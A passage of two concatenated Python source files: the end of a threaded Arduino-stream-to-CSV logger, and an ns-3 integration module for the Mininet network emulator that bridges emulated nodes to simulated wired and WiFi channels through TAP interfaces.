if(save_as_signal): # if save_as_signal is true, then we define the threads for signal csv generation
self.thread_do_csv = threading.Thread(target=self.thread_do_csv_signal, args=())
else: # if not, then we define the threads for normal csv generation
self.thread_do_csv = threading.Thread(target=self.thread_do_csv_normal, args=())
def check_if_folder_exist_and_create(self): # function that checks if path exist and if not, create it
if not os.path.exists(self.filepath): # create file folder if not exist
os.makedirs(self.filepath)
def generate_header(self): # function that generates the header of the csv file. Only when the "save_as_signal" is not True
header = ""
if(self.header == True):
if(self.custom_header is None):
if(self.add_tmp == "ms"):
header += "ms"+ self.delimiter
elif(self.add_tmp == "date"):
if(self.delimiter in self.date_format):
header += "date" + self.delimiter + "time" + self.delimiter
else:
header += "time" + self.delimiter
elif(self.add_tmp == "us"):
header += "us"+ self.delimiter
header += self.delimiter.join(self.channels_to_use)
if(self.labeled):
header += self.delimiter + "label" + "\n"
else:
header += "\n"
else:
header = self.custom_header + "\n"
return header
def format_csv(self, v): # Function that formats the csv file when "save_as_signal" is False.
period_block = float(self.block_size)/float(self.frequency)
period = float(1)/float(self.frequency) # period as inverse from the frequency
if(self.add_tmp == "ms"):
millis = int(round(time.time() * 1000)) # actual timestamp in milliseconds
period_ms = int(period * 1000) # period in milliseconds
elif(self.add_tmp == "us"):
micros = int(round(time.time() * 1000 * 1000)) # actual timestamp in microseconds
period_us = int(period * 1000 * 1000) # period in microseconds
elif(self.add_tmp == "date"):
now_datetime = datetime.now() # actual datetime
#millis = int(round(time.time() * 1000)) # actual timestamp in milliseconds. for adding to actual datetime
period_ms = int(period * 1000) # period in milliseconds
csv = "" # csv string that we write into file
if(self.add_tmp == "ms"): # check the selected timestamp type
for d in range(0, len(v)): # for d equal to 0 up to the number of rows
self.sem_1.acquire()
local_label = self.run_label # check the run_label
self.sem_1.release()
line = ""
row = v[d] # select row d
line += str(millis) + self.delimiter + self.delimiter.join(str(x) for x in row) # row to string with delimiter
millis = millis + period_ms # add "period_ms" to "millis" so the next row has the correct timestamp
if(self.labeled): # if "listen_mqtt_control" is True, then we append the "run_label" to the string
line += self.delimiter + local_label
csv += line + "\n"
elif(self.add_tmp == "us"):
for d in range(0, len(v)):
self.sem_1.acquire()
local_label = self.run_label
self.sem_1.release()
line = ""
row = v[d]
line += str(micros) + self.delimiter + self.delimiter.join(str(x) for x in row)
micros = micros + period_us
if(self.labeled):
line += self.delimiter + local_label
csv += line + "\n"
elif(self.add_tmp == "date"):
for d in range(0, len(v)):
self.sem_1.acquire()
local_label = self.run_label
self.sem_1.release()
line = ""
row = v[d]
now = now_datetime + timedelta(milliseconds=(period_ms*d))
date_time = now.strftime(self.date_format)
line += date_time + self.delimiter + self.delimiter.join(str(x) for x in row)
if(self.labeled):
line += self.delimiter + local_label
csv += line + "\n"
elif(self.add_tmp is None): # if "add_tmp" is None
for d in range(0, len(v)):
self.sem_1.acquire()
local_label = self.run_label
self.sem_1.release()
line = ""
row = v[d]
line += self.delimiter.join(str(x) for x in row)
if(self.labeled):
line += self.delimiter + local_label
csv += line + "\n"
return csv # return csv string
def thread_read_channels(self): # thread that read the stream and put the values in a queue
try:
s = stream.Arduino_stream(self.block_size, self.channels_to_use, self.frequency, self.port, self.baudrate)
s.connect()
self.start_flag.wait() # wait for "start_flag" to be set to start the stream
s.start()
stream_is_on = True # "stream_is_on" flag to True
while(self.stream_thread_keepalive_flag.is_set()): # while "stream_thread_keepalive_flag" is set maintain this thread alive
if(self.start_flag.is_set()): # if "start_flag" is set ("run_cmd" is "start"), then we read. If not then we are in stop and we do nothing
if(stream_is_on): # if stream is on we read
v = s.read(transpose=(not self.save_as_signal))
self.stream_values.put(v)
self.sem_3.acquire()
self.values_count += 1
self.sem_3.release()
else: # if stream is not on, then we start the stream
#s.connect()
s.start()
stream_is_on = True
else:
s.stop()
stream_is_on = False
if(stream_is_on):
s.stop()
s.disconnect()
stream_is_on = False
except Exception as err:
self.sem_2.acquire()
self.status = 3
self.sem_2.release()
self.sem_4.acquire()
self.error_str = str(err)
self.sem_4.release()
raise err
def thread_do_csv_normal(self): # thread that generates a normal labeled csv file.
self.check_if_folder_exist_and_create()
try:
if(self.filename == ""):
raise ValueError("no filename defined")
f = open(self.filepath + self.filename, self.mode) # open files
if(os.stat(self.filepath + self.filename).st_size == 0): # if file has nothing, then write header
header = self.generate_header()
f.write(header)
while(self.stream_thread_keepalive_flag.is_set()): # keep alive as long "stream_thread_keepalive_flag" is set
if(self.stream_values.empty() == False): # if the "stream_values" is not empty
try:
v = self.stream_values.get(block=False) # read queue / non blocking
except queue.Empty:
pass
else:
csv = self.format_csv(v) # format stream values to csv string
f.write(csv) # write csv
f.close() # close file
except Exception as err:
self.sem_2.acquire()
self.status = 3
self.sem_2.release()
self.sem_4.acquire()
self.error_str = str(err)
self.sem_4.release()
raise err
def thread_do_csv_signal(self): # thread that generate a labeled signal csv file.
self.check_if_folder_exist_and_create()
try:
f_x = []
for c in (self.channels_to_use): # open file for every element in "channels_to_use"
f_x.append(open(self.filepath + "x_" + c + "_" + ".csv", self.mode))
if(self.labeled):
f_y = open(self.filepath + "y_" +".csv", self.mode) # open label file
while(self.stream_thread_keepalive_flag.is_set()): # keep alive as long "stream_thread_keepalive_flag" is set
if(self.stream_values.empty() == False): # if the "stream_values" is not empty
try:
v = self.stream_values.get(block=False) # read queue / non blocking
except queue.Empty:
pass
else:
self.sem_1.acquire()
local_label = self.run_label # look for actual "run_label"
self.sem_1.release()
if(self.labeled):
f_y.write(str(local_label) + "\n") # write label in label file
for n in range(0, len(v)): # for every channel or dimension in the returned list
line = ""
row = v[n] # select one channel. --> (v is a n-dimensional-list with every dimension a channel) <--
line += self.delimiter.join(str(x) for x in row) # signal to string with dlimiter
f_x[n].write(line + "\n") # write complete signal in row of the csv file
if(self.labeled):
f_y.close()
for f in f_x: # close files
f.close()
except Exception as err:
self.sem_2.acquire()
self.status = 3
self.sem_2.release()
self.sem_4.acquire()
self.error_str = str(err)
self.sem_4.release()
raise err
def get_status(self, status_text=True):
self.sem_1.acquire()
local_label = self.run_label
self.sem_1.release()
self.sem_2.acquire()
local_status = self.status
self.sem_2.release()
self.sem_3.acquire()
local_count = self.values_count
self.sem_3.release()
self.sem_4.acquire()
local_error = self.error_str
self.sem_4.release()
if(status_text):
status = self.generation_status[local_status]
else:
status = local_status
return {"label":local_label, "count":local_count, "status":status, "err_info": local_error}
def set_label(self, label):
self.sem_1.acquire()
self.run_label = label
self.sem_1.release()
def start(self): # function that start the threads and set the flags for start the generation of the csv file
self.sem_2.acquire()
self.status = 0
self.sem_2.release()
self.start_flag.set()
self.stream_thread_keepalive_flag.set()
if (not self.thread_read_stream.is_alive()):
self.thread_read_stream.start()
if (not self.thread_do_csv.is_alive()):
self.thread_do_csv.start()
def pause(self):
self.start_flag.clear()
self.sem_2.acquire()
self.status = 1
self.sem_2.release()
def stop(self):
self.start_flag.clear()
self.stream_thread_keepalive_flag.clear()
self.sem_2.acquire()
self.status = 2
self.sem_2.release()
self.thread_do_csv.join()
self.thread_read_stream.join()
|
ns3.py
|
"""
From https://github.com/piotrjurkiewicz/mininet.git
Credit: Piotr Jurkiewicz
"""
"""
NS-3 integration for Mininet.
Mininet Mininet
node 1 node 2
+---------+ +---------+
| name | | name |
| space 1 | | space 2 |
| ------- | |---------|
| shell | | shell |
| ------- | |---------|
| Linux | | Linux |
| network | | network |
| stack | ns-3 ns-3 | stack |
| ------ | node 1 node 2 |---------|
| TAP | |===========| |===========| | TAP |
| intf. |<-fd->| TapBridge | | TapBridge |<-fd->| intf. |
+---------+ | --------- | | --------- | +---------+
| ns-3 | | ns-3 |
| net | | net |
| device | | device |
+-----------+ +-----------+
|| ||
+---------------------------+
| ns-3 channel |
+---------------------------+
|<------------------------------->|
ns-3 process
in the root namespace
"""
import threading, time, random
from mininet.log import info, error, warn, debug
from mininet.link import Intf, Link
from mininet.node import Switch, Node
from mininet.util import quietRun, moveIntf, errRun
import ns.core
import ns.network
import ns.tap_bridge
import ns.csma
import ns.wifi
import ns.mobility
# Default duration of ns-3 simulation thread. You can freely modify this value.
default_duration = 3600
# Set ns-3 simulator type to realtime simulator implementation.
# You can find more information about realtime modes here:
# http://www.nsnam.org/docs/release/3.17/manual/singlehtml/index.html#realtime
# http://www.nsnam.org/wiki/index.php/Emulation_and_Realtime_Scheduler
ns.core.GlobalValue.Bind( "SimulatorImplementationType", ns.core.StringValue( "ns3::RealtimeSimulatorImpl" ) )
# Enable checksum computation in ns-3 devices. By default ns-3 does not compute checksums - it is not needed
# when it runs in simulation mode. However, when it runs in emulation mode and exchanges packets with the real
# world, bit errors may occur in the real world, so we need to enable checksum computation.
ns.core.GlobalValue.Bind( "ChecksumEnabled", ns.core.BooleanValue ( "true" ) )
# Arrays which track all created TBIntf objects and Mininet nodes which has assigned an underlying ns-3 node.
allTBIntfs = []
allNodes = []
# These four global functions below are used to control ns-3 simulator thread. They are global, because
# ns-3 has one global singleton simulator object.
def start():
""" Start the simulator thread in background.
It should be called after configuration of all ns-3 objects
(TBintfs, Segments and Links).
Attempt of adding an ns-3 object when simulator thread is
running may result in segfault. You should stop it first."""
global thread
if 'thread' in globals() and thread.isAlive():
warn( "NS-3 simulator thread already running." )
return
# Install all TapBridge ns-3 devices not installed yet.
for intf in allTBIntfs:
if not intf.nsInstalled:
intf.nsInstall()
# Set up the simulator thread.
thread = threading.Thread( target = runthread )
thread.daemon = True
# Start the simulator thread (this is where fork happens).
# FORK!
thread.start()
# FORK:PARENT
# Code below is executed in the parent thread.
# Move all tap interfaces not moved yet to the right namespace.
for intf in allTBIntfs:
if not intf.inRightNamespace:
intf.namespaceMove()
return
def runthread():
""" Method called in the simulator thread on its start.
Should not be called manually."""
# FORK:CHILD
# Code below is executed in the simulator thread after the fork.
# Stop event must be scheduled before simulator start. Not scheduling it
# may lead leads to segfault.
ns.core.Simulator.Stop( ns.core.Seconds( default_duration ) )
# Start simulator. Function below blocks the Python thread and returns when simulator stops.
ns.core.Simulator.Run()
def stop():
""" Stop the simulator thread now."""
# Schedule a stop event.
ns.core.Simulator.Stop( ns.core.MilliSeconds( 1 ) )
# Wait until the simulator thread stops.
while thread.isAlive():
time.sleep( 0.01 )
return
def clear():
""" Clear ns-3 simulator.
It should be called when simulator is stopped."""
ns.core.Simulator.Destroy()
for intf in allTBIntfs:
intf.nsInstalled = False
#intf.delete()
for node in allNodes:
del node.nsNode
del allTBIntfs[:]
del allNodes[:]
return
def createAttributes( n0="", v0=ns.core.EmptyAttributeValue(),
n1="", v1=ns.core.EmptyAttributeValue(),
n2="", v2=ns.core.EmptyAttributeValue(),
n3="", v3=ns.core.EmptyAttributeValue(),
n4="", v4=ns.core.EmptyAttributeValue(),
n5="", v5=ns.core.EmptyAttributeValue(),
n6="", v6=ns.core.EmptyAttributeValue(),
n7="", v7=ns.core.EmptyAttributeValue()):
attrs = { 'n0' : n0, 'v0' : v0,
'n1' : n1, 'v1' : v1,
'n2' : n2, 'v2' : v2,
'n3' : n3, 'v3' : v3,
'n4' : n4, 'v4' : v4,
'n5' : n5, 'v5' : v5,
'n6' : n6, 'v6' : v6,
'n7' : n7, 'v7' : v7 }
return attrs
def setAttributes( func, typeStr, attrs):
a = { 'n0' : "", 'v0' : ns.core.EmptyAttributeValue(),
'n1' : "", 'v1' : ns.core.EmptyAttributeValue(),
'n2' : "", 'v2' : ns.core.EmptyAttributeValue(),
'n3' : "", 'v3' : ns.core.EmptyAttributeValue(),
'n4' : "", 'v4' : ns.core.EmptyAttributeValue(),
'n5' : "", 'v5' : ns.core.EmptyAttributeValue(),
'n6' : "", 'v6' : ns.core.EmptyAttributeValue(),
'n7' : "", 'v7' : ns.core.EmptyAttributeValue() }
a.update (attrs)
func (typeStr, a['n0'], a['v0'], a['n1'], a['v1'],
a['n2'], a['v2'], a['n3'], a['v3'],
a['n4'], a['v4'], a['n5'], a['v5'],
a['n6'], a['v6'], a['n7'], a['v7'])
def createMobilityHelper( mobilityType = "ns3::ConstantVelocityMobilityModel", **attrs):
mobHelper = ns.mobility.MobilityHelper()
setAttributes (mobHelper.SetMobilityModel, mobilityType, attrs)
return mobHelper
def setPositionAllocate( mobHelper, posAllocateType = "ns3::RandomDiscPositionAllocator", **attrs):
setAttributes (mobHelper.SetPositionAllocator, posAllocateType, attrs)
return mobHelper
def setListPositionAllocate( mobHelper, lpa):
mobHelper.SetPositionAllocator(lpa)
return mobHelper
def createListPositionAllocate(**attrs):
lpa = ns.mobility.ListPositionAllocator()
i = 1
while True:
if not attrs.has_key ('x'+ str(i)) and not attrs.has_key ('y'+ str(i)) and not attrs.has_key ('z'+ str(i)):
break
x = attrs.get('x'+ str(i), 0)
y = attrs.get('y'+ str(i), 0)
z = attrs.get('z'+ str(i), 0)
lpa.Add(ns.core.Vector(x, y, z))
i = i+1
return lpa
def hasMobilityModel( node ):
if hasattr( node, 'nsNode' ) and node.nsNode is not None:
pass
else:
node.nsNode = ns.network.Node()
allNodes.append( node )
try:
mm = node.nsNode.GetObject(ns.mobility.MobilityModel.GetTypeId())
return ( mm is not None )
except AttributeError:
warn("ns-3 mobility model not found\n")
return False
def getMobilityModel( node ):
''' Return the mobility model of a node
'''
if hasattr( node, 'nsNode' ) and node.nsNode is not None:
pass
else:
node.nsNode = ns.network.Node()
allNodes.append( node )
try:
mm = node.nsNode.GetObject(ns.mobility.MobilityModel.GetTypeId())
return mm
except AttributeError:
warn("ns-3 mobility model not found\n")
return None
def setMobilityModel( node, mobHelper = None):
''' Set the mobility model of a node
'''
if hasattr( node, 'nsNode' ) and node.nsNode is not None:
pass
else:
node.nsNode = ns.network.Node()
allNodes.append( node )
if mobHelper is None:
mobHelper = createMobilityHelper ()
mobHelper.Install (node.nsNode)
# Functions for manipulating nodes positions. Nodes positioning is useful in
# wireless channel simulations: distance between nodes affects received signal power
# and, thus, throughput.
# Node positions are stored in the underlying ns-3 node (not in Mininet node itself).
def getPosition( node ):
""" Return the ns-3 (x, y, z) position of a Mininet node.
Coordinates are in the 3D Cartesian system.
The unit is meters.
node: Mininet node"""
# Check if this Mininet node has assigned the underlying ns-3 node.
if hasattr( node, 'nsNode' ) and node.nsNode is not None:
# If it is assigned, go ahead.
pass
else:
# If not, create new ns-3 node and assign it to this Mininet node.
node.nsNode = ns.network.Node()
allNodes.append( node )
try:
# Get postion coordinates from the ns-3 node
mm = node.nsNode.GetObject( ns.mobility.MobilityModel.GetTypeId() )
pos = mm.GetPosition()
return ( pos.x, pos.y, pos.z )
except AttributeError:
warn( "ns-3 mobility model not found\n" )
return ( 0, 0, 0 )
def setPosition( node, x, y, z ):
""" Set the ns-3 (x, y, z) position of a Mininet node.
Coordinates are in the 3D Cartesian system.
The unit is meters.
node: Mininet node
x: integer or float x coordinate
y: integer or float y coordinate
z: integer or float z coordinate"""
# Check if this Mininet node has assigned the underlying ns-3 node.
if hasattr( node, 'nsNode' ) and node.nsNode is not None:
# If it is assigned, go ahead.
pass
else:
# If not, create new ns-3 node and assign it to this Mininet node.
node.nsNode = ns.network.Node()
allNodes.append( node )
try:
mm = node.nsNode.GetObject( ns.mobility.MobilityModel.GetTypeId() )
if x is None:
x = 0.0
if y is None:
y = 0.0
if z is None:
z = 0.0
# Set postion coordinates in the ns-3 node
pos = mm.SetPosition( ns.core.Vector( x, y, z ) )
except AttributeError:
warn( "ns-3 mobility model not found, not setting position\n" )
def getVelocity( node ):
''' Return the ns-3 (x, y, z) velocity of a node.
'''
if hasattr( node, 'nsNode' ) and node.nsNode is not None:
pass
else:
node.nsNode = ns.network.Node()
allNodes.append( node )
try:
mm = node.nsNode.GetObject(ns.mobility.ConstantVelocityMobilityModel.GetTypeId())
vel = mm.GetVelocity()
return (vel.x, vel.y, vel.z)
except AttributeError:
warn("ns-3 constant velocity mobility model not found\n")
return (0,0,0)
def setVelocity( node, x = None, y = None, z = None ):
''' Set the ns-3 (x, y, z) velocity of a node.
'''
if hasattr( node, 'nsNode' ) and node.nsNode is not None:
pass
else:
node.nsNode = ns.network.Node()
allNodes.append( node )
try:
mm = node.nsNode.GetObject(ns.mobility.ConstantVelocityMobilityModel.GetTypeId())
if x is None:
x = 0.0
if y is None:
y = 0.0
if z is None:
z = 0.0
vel = mm.SetVelocity(ns.core.Vector(x, y, z))
except AttributeError:
warn("ns-3 constant velocity mobility model not found, not setting position\n")
# TBIntf is the main workhorse of the module. TBIntf is a tap Linux interface located on Mininet
# node, which is bridged with ns-3 device located on ns-3 node.
class TBIntf( Intf ):
""" Interface object that is bridged with ns-3 emulated device.
This is a subclass of Mininet basic Inft object. """
def __init__( self, name, node, port=None,
nsNode=None, nsDevice=None, mode=None, **params ):
"""name: interface name (e.g. h1-eth0)
node: owning Mininet node (where this intf most likely lives)
link: parent link if we're part of a link #TODO
nsNode: underlying ns-3 node
nsDevice: ns-3 device which the tap interface is bridged with
mode: mode of TapBridge ns-3 device (UseLocal or UseBridge)
other arguments are passed to config()"""
self.name = name
# Create a tap interface in the system, ns-3 TapBridge will connect to that interface later.
self.createTap()
# Set this Intf to be delayed move. This tells Mininet not to move the interface to the right
# namespace during Intf.__init__(). Therefore, the interface must be moved manually later.
# Actually, interfaces are moved right after the simulator thread start, in the start() global
# function.
self.delayedMove = True
# If this node is running in its own namespace...
if node.inNamespace:
# ...this interface is not yet in the right namespace (it is in the root namespace just after
# creation) and should be moved later.
self.inRightNamespace = False
else:
# ...interface should stay in the root namespace, so it is in right namespace now.
self.inRightNamespace = True
# Initialize parent Intf object.
Intf.__init__( self, name, node, port , **params)
allTBIntfs.append( self )
self.nsNode = nsNode
self.nsDevice = nsDevice
self.mode = mode
self.params = params
self.nsInstalled = False
# Create TapBridge ns-3 device.
self.tapbridge = ns.tap_bridge.TapBridge()
# If ns-3 node and bridged ns-3 device are set and TapBridge mode is known...
if self.nsNode and self.nsDevice and ( self.mode or self.node ):
# ...call nsInstall().
self.nsInstall()
def createTap( self ):
"""Create tap Linux interface in the root namespace."""
quietRun( 'ip tuntap add ' + self.name + ' mode tap' )
def nsInstall( self ):
"""Install TapBridge ns-3 device in the ns-3 simulator."""
if not isinstance( self.nsNode, ns.network.Node ):
warn( "Cannot install TBIntf to ns-3 Node: "
"nsNode not specified\n" )
return
if not isinstance( self.nsDevice, ns.network.NetDevice ):
warn( "Cannot install TBIntf to ns-3 Node: "
"nsDevice not specified\n" )
return
# If TapBridge mode has not been set explicitly, determine it automatically basing on
# a Mininet node type. You can find more about TapBridge modes there:
# http://www.nsnam.org/docs/release/3.18/models/singlehtml/index.html#tap-netdevice
if self.mode is None and self.node is not None:
# If Mininet node is some kind of Switch...
if isinstance( self.node, Switch ):
# ...use "UseBridge" mode. In this mode there may be many different L2 devices with
# many source addresses on the Linux side of TapBridge, but bridged ns-3 device must
# support SendFrom().
self.mode = "UseBridge"
else:
# ...in the other case use "UseLocal" mode. In this mode there may be only one L2 source device
# on the Linux side of TapBridge (TapBridge will change source MAC address of all packets coming
# from the tap interface to the discovered address of this interface). In this mode bridged ns-3
# device does not have to support SendFrom() (it uses Send() function to send packets).
self.mode = "UseLocal"
if self.mode is None:
warn( "Cannot install TBIntf to ns-3 Node: "
"cannot determine mode: neither mode nor (mininet) node specified\n" )
return
# Set all required TapBridge attributes.
self.tapbridge.SetAttribute ( "Mode", ns.core.StringValue( self.mode ) )
self.tapbridge.SetAttribute ( "DeviceName", ns.core.StringValue( self.name ) )
self.tapbridge.SetAttributeFailSafe ( "Instant", ns.core.BooleanValue( True ) ) # to be implemented in ns-3
# Add TapBridge device to the ns-3 node.
self.nsNode.AddDevice( self.tapbridge )
# Set this TapBridge to be bridged with the specified ns-3 device.
self.tapbridge.SetBridgedNetDevice( self.nsDevice )
# Installation is done.
self.nsInstalled = True
def namespaceMove( self ):
"""Move tap Linux interface to the right namespace."""
loops = 0
# Wait until ns-3 process connects to the tap Linux interface. ns-3 process resides in the root
# network namespace, so it must manage to connect to the interface before it is moved to the node
# namespace. After interface move ns-3 process will not see the interface.
while not self.isConnected():
time.sleep( 0.01 )
loops += 1
if loops > 10:
warn( "Cannot move TBIntf to mininet Node namespace: "
"ns-3 has not connected yet to the TAP interface\n" )
return
# Wait a little more, just for be sure ns-3 process not miss that.
time.sleep( 0.01 )
# Move interface to the right namespace.
moveIntf( self.name, self.node )
self.inRightNamespace = True
# IP address has been reset while moving to namespace, needs to be set again.
if self.ip is not None:
self.setIP( self.ip, self.prefixLen )
# The same for 'up'.
self.isUp( True )
def isConnected( self ):
"""Check if ns-3 TapBridge has connected to the Linux tap interface."""
return self.tapbridge.IsLinkUp()
def cmd( self, *args, **kwargs ):
"Run a command in our owning node namespace or in the root namespace when not yet inRightNamespace."
if self.inRightNamespace:
return self.node.cmd( *args, **kwargs )
else:
cmd = ' '.join( [ str( c ) for c in args ] )
return errRun( cmd )[ 0 ]
def rename( self, newname ):
"Rename interface"
# If TapBridge is installed in ns-3, but ns-3 has not connected to the Linux tap interface yet...
if self.nsInstalled and not self.isConnected():
# ...change device name in TapBridge to the new one.
self.tapbridge.SetAttribute ( "DeviceName", ns.core.StringValue( newname ) )
Intf.rename( self, newname )
def delete( self ):
"Delete interface"
if self.nsInstalled:
warn( "You can not delete once installed ns-3 device, "
"run mininet.ns3.clear() to delete all ns-3 devices\n" )
else:
Intf.delete( self )
# Network segment is a Mininet object consistng of ns-3 channel of a specific type. This can be seen as
# an equivalent of collision domain. Many Mininet nodes can be connected to the one network segment.
# During connecting, Mininet creates ns-3 device of particular type in the underlying ns-3 node.
# Then it connects this ns-3 device to the segment's ns-3 channel. Next, Mininet creates TBIntf in the
# specified Mininet node and bridges this tap interface with the ns-3 device created formerly.
# Network link is a subclass of network segment. It is a network segment with only two nodes connected.
# Moreover, network link is a subclass of Mininet Link. It means that you can use it like standard Mininet
# Link and alternatively with it: it supports all methods of its superclass and constructor arguments order
# is the same.
# SimpleChannel is the simplest channel model available in ns-3. Many devices can be connected to it
# simultaneously. Devices supports SendFrom(), therefore it can be used in "UseBridge" mode (for example
# for connecting switches). There is no implemented channel blocking - many devices can transmit
# simultaneously. Data rate and channel delay can not be set. However, one can
# set the receiver error model in SimpleNetDevice to simulate packet loss. You can find more information
# about the SimpleChannel in its source code and here:
# http://www.nsnam.org/docs/doxygen/classns3_1_1_simple_channel.html
class SimpleSegment( object ):
"""The simplest channel model available in ns-3.
SimpleNetDevice supports SendFrom()."""
def __init__( self ):
self.channel = ns.network.SimpleChannel()
def add( self, node, port=None, intfName=None, mode=None ):
"""Connect Mininet node to the segment.
node: Mininet node
port: node port number (optional)
intfName: node tap interface name (optional)
mode: TapBridge mode (UseLocal or UseBridge) (optional)"""
# Check if this Mininet node has assigned an underlying ns-3 node.
if hasattr( node, 'nsNode' ) and node.nsNode is not None:
# If it is assigned, go ahead.
pass
else:
# If not, create new ns-3 node and assign it to this Mininet node.
node.nsNode = ns.network.Node()
allNodes.append( node )
# Create ns-3 device.
device = ns.network.SimpleNetDevice()
device.SetAddress (ns.network.Mac48Address.Allocate ())
# Connect this device to the segment's channel.
device.SetChannel(self.channel)
# Add this device to the ns-3 node.
node.nsNode.AddDevice(device)
# If port number is not specified...
if port is None:
# ...obtain it automatically.
port = node.newPort()
# If interface name is not specified...
if intfName is None:
# ...obtain it automatically.
intfName = node.name + '-eth' + repr( port )
# In the specified Mininet node, create TBIntf bridged with the 'device'.
tb = TBIntf( intfName, node, port, node.nsNode, device, mode )
return tb
class SimpleLink( SimpleSegment, Link ):
"""Link between two nodes using the SimpleChannel ns-3 model"""
def __init__( self, node1, node2, port1=None, port2=None,
intfName1=None, intfName2=None ):
"""Create simple link to another node, making two new tap interfaces.
node1: first Mininet node
node2: second Mininet node
port1: node1 port number (optional)
port2: node2 port number (optional)
intfName1: node1 interface name (optional)
intfName2: node2 interface name (optional)"""
SimpleSegment.__init__( self )
intf1 = SimpleSegment.add( self, node1, port1, intfName1 )
intf2 = SimpleSegment.add( self, node2, port2, intfName2 )
intf1.link = self
intf2.link = self
self.intf1, self.intf2 = intf1, intf2
# CsmaChannel is a more advanced model, built up upon SimpleChannel model. CsmaChannel is an equivalent
# of Ethernet channel, with CSMA blocking during transmission. Moreover, data rate and channel delay can
# be set (notice: setting high delay can result in low data rate, as channel is considered blocked for the
# trasmission of next packet for the delay interval after transmission start).
# You can find more information about CsmaChannel and CsmaNetDevice here:
# http://www.nsnam.org/docs/release/3.18/models/singlehtml/index.html#document-csma
class CSMASegment( object ):
"""Equivalent of the Ethernet channel
CsmaNetDevice supports SendFrom()"""
def __init__( self, DataRate=None, Delay=None ):
"""DataRate: forced data rate of connected devices (optional), for example: 10Mbps, default: no-limit
Delay: channel trasmission delay (optional), for example: 10ns, default: 0"""
self.channel = ns.csma.CsmaChannel()
if DataRate is not None:
self.channel.SetAttribute( "DataRate", ns.network.DataRateValue( ns.network.DataRate( DataRate ) ) )
if Delay is not None:
self.channel.SetAttribute( "Delay", ns.core.TimeValue( ns.core.Time( Delay ) ) )
def add( self, node, port=None, intfName=None, mode=None ):
"""Connect Mininet node to the segment.
node: Mininet node
port: node port number (optional)
intfName: node tap interface name (optional)
mode: TapBridge mode (UseLocal or UseBridge) (optional)"""
# Check if this Mininet node has assigned an underlying ns-3 node.
if hasattr( node, 'nsNode' ) and node.nsNode is not None:
# If it is assigned, go ahead.
pass
else:
# If not, create new ns-3 node and assign it to this Mininet node.
node.nsNode = ns.network.Node()
allNodes.append( node )
# Create ns-3 device.
device = ns.csma.CsmaNetDevice()
# Create queue used in the device.
queue = ns.network.DropTailQueue()
# Connect this device to the segment's channel.
device.Attach(self.channel)
# Set ns-3 device to use created queue.
device.SetQueue(queue)
device.SetAddress (ns.network.Mac48Address.Allocate ())
# Add this device to the ns-3 node.
node.nsNode.AddDevice(device)
# If port number is not specified...
if port is None:
# ...obtain it automatically.
port = node.newPort()
# If interface name is not specified...
if intfName is None:
# ...obtain it automatically.
intfName = node.name + '-eth' + repr( port )
# In the specified Mininet node, create TBIntf bridged with the 'device'.
tb = TBIntf( intfName, node, port, node.nsNode, device, mode )
return tb
class CSMALink( CSMASegment, Link ):
"""Link between two nodes using the CsmaChannel ns-3 model"""
def __init__( self, node1, node2, port1=None, port2=None,
intfName1=None, intfName2=None, DataRate=None, Delay=None ):
"""Create Ethernet link to another node, making two new tap interfaces.
node1: first Mininet node
node2: second Mininet node
port1: node1 port number (optional)
port2: node2 port number (optional)
intfName1: node1 interface name (optional)
intfName2: node2 interface name (optional)
DataRate: forced data rate of connected devices (optional), for example: 10Mbps, default: no-limit
Delay: channel trasmission delay (optional), for example: 10ns, default: 0"""
CSMASegment.__init__( self, DataRate, Delay )
intf1 = CSMASegment.add( self, node1, port1, intfName1 )
intf2 = CSMASegment.add( self, node2, port2, intfName2 )
intf1.link = self
intf2.link = self
self.intf1, self.intf2 = intf1, intf2
# Wifi model in ns-3 is much more complicated than wired models. Fortunatelly, there are many
# tutorials and examples of its usage in the net. Moreover, there is a large community of researchers
# and programmers around it.
# You can find more information about Wifi ns-3 model here:
# http://www.nsnam.org/docs/release/3.18/models/singlehtml/index.html#document-wifi
# In order to facilitate its usage, it provides a series of helpers. Helpers are objects which provides
# fucntions used to create and set up of various components of Wifi model.
class WIFISegment( object ):
"""Equivalent of radio WiFi channel.
Only Ap and WDS devices support SendFrom()."""
def __init__( self, enableQos=True ):
# Helpers instantiation.
self.wifihelper = ns.wifi.WifiHelper.Default()
self.wifihelper.SetStandard (ns.wifi.WIFI_PHY_STANDARD_80211g)
self.phyhelper = ns.wifi.YansWifiPhyHelper.Default()
self.channelhelper = ns.wifi.YansWifiChannelHelper.Default()
self.phyhelper.SetChannel ( self.channelhelper.Create() )
if enableQos:
self.machelper = ns.wifi.QosWifiMacHelper.Default()
else:
self.machelper = ns.wifi.NqosWifiMacHelper.Default()
def add( self, node, port=None, intfName=None, mode=None ):
"""Connect Mininet node to the segment.
Will create WifiNetDevice with Mac type specified in
the MacHelper (default: AdhocWifiMac).
node: Mininet node
port: node port number (optional)
intfName: node tap interface name (optional)
mode: TapBridge mode (UseLocal or UseBridge) (optional)"""
# Check if this Mininet node has assigned an underlying ns-3 node.
if hasattr( node, 'nsNode' ) and node.nsNode is not None:
# If it is assigned, go ahead.
pass
else:
# If not, create new ns-3 node and assign it to this Mininet node.
node.nsNode = ns.network.Node()
allNodes.append( node )
# Install new device to the ns-3 node, using provided helpers.
device = self.wifihelper.Install( self.phyhelper, self.machelper, node.nsNode ).Get( 0 )
mobilityhelper = ns.mobility.MobilityHelper()
# Install mobility object to the ns-3 node.
mobilityhelper.Install( node.nsNode )
# If port number is not specified...
if port is None:
# ...obtain it automatically.
port = node.newPort()
# If interface name is not specified...
if intfName is None:
# ...obtain it automatically.
intfName = node.name + '-eth' + repr( port )
# In the specified Mininet node, create TBIntf bridged with the 'device'.
tb = TBIntf( intfName, node, port, node.nsNode, device, mode )
return tb
def addAdhoc( self, node, port=None, intfName=None, mode=None ):
"""Connect Mininet node to the segment.
Will create WifiNetDevice with AdhocWifiMac.
Devices in that mode does not support SendFrom().
node: Mininet node
port: node port number (optional)
intfName: node tap interface name (optional)
mode: TapBridge mode (UseLocal or UseBridge) (optional)"""
self.machelper.SetType ("ns3::AdhocWifiMac")
return self.add( node, port, intfName, mode )
def addAp( self, node, port=None, intfName=None, mode=None, channelNumber=1, ssid="default-ssid" ):
"""Connect Mininet node to the segment.
Will create WifiNetDevice with ApWifiMac (access point).
Devices in that mode supports SendFrom() (can be used on switches).
node: Mininet node
port: node port number (optional)
intfName: node tap interface name (optional)
mode: TapBridge mode (UseLocal or UseBridge) (optional)
ssid: network SSID (optional)"""
self.machelper.SetType ("ns3::ApWifiMac",
"Ssid", ns.wifi.SsidValue (ns.wifi.Ssid(ssid)),
